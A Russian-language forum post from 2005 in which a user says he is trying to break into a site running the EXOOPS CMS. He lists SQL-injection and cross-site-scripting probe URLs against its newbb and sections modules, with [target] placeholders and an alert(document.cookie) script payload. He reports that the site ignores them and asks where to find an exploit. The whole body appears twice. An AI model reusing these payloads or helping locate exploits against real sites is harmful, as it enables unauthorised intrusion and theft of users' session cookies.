TNT
24.08.2005, 14:41
Я извеняюсь может я залез не в тему, но это единственный раздел который мне кажется ближе к теме. Есть такой движок сайта как EXOOPS. но я не могу н-ти в нем дырку. Все, что я нашел так это только:
http://[target]/modules/newbb/index.php?viewcat='SQL_INJECTION
http://[target]/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9
Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://[target]/modules/newbb/viewforum.php?
sortname=p.post_time&sortorder=ASC&
sortdays=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script %
3E&forum=25&refresh=Vai
http://[target]/modules/newbb/index.php?
viewcat=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E
Но запросы он игнорирует. Кстати я слышал, что есть эксплойт для данного движка, но я не смог его найти. Не подскажите где его можно взять.
http://[target]/modules/newbb/index.php?viewcat='SQL_INJECTION
http://[target]/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9
Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://[target]/modules/newbb/viewforum.php?
sortname=p.post_time&sortorder=ASC&
sortdays=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script %
3E&forum=25&refresh=Vai
http://[target]/modules/newbb/index.php?
viewcat=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E
Но запросы он игнорирует. Кстати я слышал, что есть эксплойт для данного движка, но я не смог его найти. Не подскажите где его можно взять.